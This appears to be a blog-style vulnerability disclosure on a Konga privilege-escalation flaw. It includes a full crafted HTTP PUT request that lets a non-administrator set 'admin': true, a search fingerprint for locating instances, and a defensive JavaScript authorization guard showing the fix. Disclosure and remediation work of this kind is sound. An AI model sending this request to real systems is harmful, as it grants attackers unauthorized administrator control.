Konga Vulnerability For Ordinary Users To Obtain Administrator Permissions Overstepping Their Rights
Vulnerability Description
In Konga, an ordinary (non-administrator) user can obtain administrator permissions by sending a crafted request to the user-update API.
Vulnerability Impact
Konga
Network mapping (asset search) fingerprint: “konga”
Vulnerability Reproduction
Login page
Create a non-administrator user, log in as that user, and obtain its token.
Send the following request, replacing the token with the one just obtained:
PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241

{
    "admin": true,
    "passports": {
        "password": "1234abcd",
        "protocol": "local"
    },
    "password_confirmation": "1234abcd",
    "token": "non-administrator user token"
}
The non-administrator account is successfully converted to an administrator user: the update handler accepts the "admin" field from any authenticated caller instead of restricting it to administrators.
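As an added example (not Konga's own code), the following server-side authorization check shows the missing control for a user-update endpoint like PUT /api/user/:id: the "admin" flag may only be set by an administrator, a non-administrator may only update their own record, and the body is allow-listed instead of passed straight to the ORM. The requester shape ({ id, admin }) and the allowed field names are assumptions for this example.

```javascript
// Added example (not Konga's own code): authorization guard for a user-update
// endpoint such as PUT /api/user/:id. The requester object ({ id, admin }) and
// the field names below are assumptions for this illustration.

const PRIVILEGED_FIELDS = new Set(['admin']);
// Fields an update may carry; the session token is handled by authentication,
// not by the update body, so it is deliberately not in this list.
const UPDATABLE_FIELDS = ['username', 'email', 'passports', 'password_confirmation'];

function authorizeUserUpdate(requester, targetUserId, body) {
  if (!requester || typeof requester.id !== 'number') {
    return { ok: false, status: 401, reason: 'unauthenticated' };
  }
  // Non-administrators may only modify their own account.
  if (!requester.admin && requester.id !== targetUserId) {
    return { ok: false, status: 403, reason: 'cannot modify other users' };
  }
  // Reject (rather than silently drop) a non-administrator's attempt to set a
  // privileged field; an explicit 403 is also a useful audit signal.
  if (!requester.admin) {
    for (const field of Object.keys(body)) {
      if (PRIVILEGED_FIELDS.has(field)) {
        return { ok: false, status: 403, reason: `field not allowed: ${field}` };
      }
    }
  }
  // Allow-list the remaining fields instead of forwarding the raw body.
  const sanitized = {};
  for (const f of UPDATABLE_FIELDS) if (f in body) sanitized[f] = body[f];
  if (requester.admin && 'admin' in body) sanitized.admin = Boolean(body.admin);
  return { ok: true, status: 200, body: sanitized };
}

// Constructed sample: the request body from the write-up, sent by a
// non-administrator whose own user id is 7.
const escalationAttempt = {
  admin: true,
  passports: { password: '1234abcd', protocol: 'local' },
  password_confirmation: '1234abcd',
};
console.log(authorizeUserUpdate({ id: 7, admin: false }, 7, escalationAttempt));
// → { ok: false, status: 403, reason: 'field not allowed: admin' }
```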
This post is licensed under CC BY 4.0 by the author.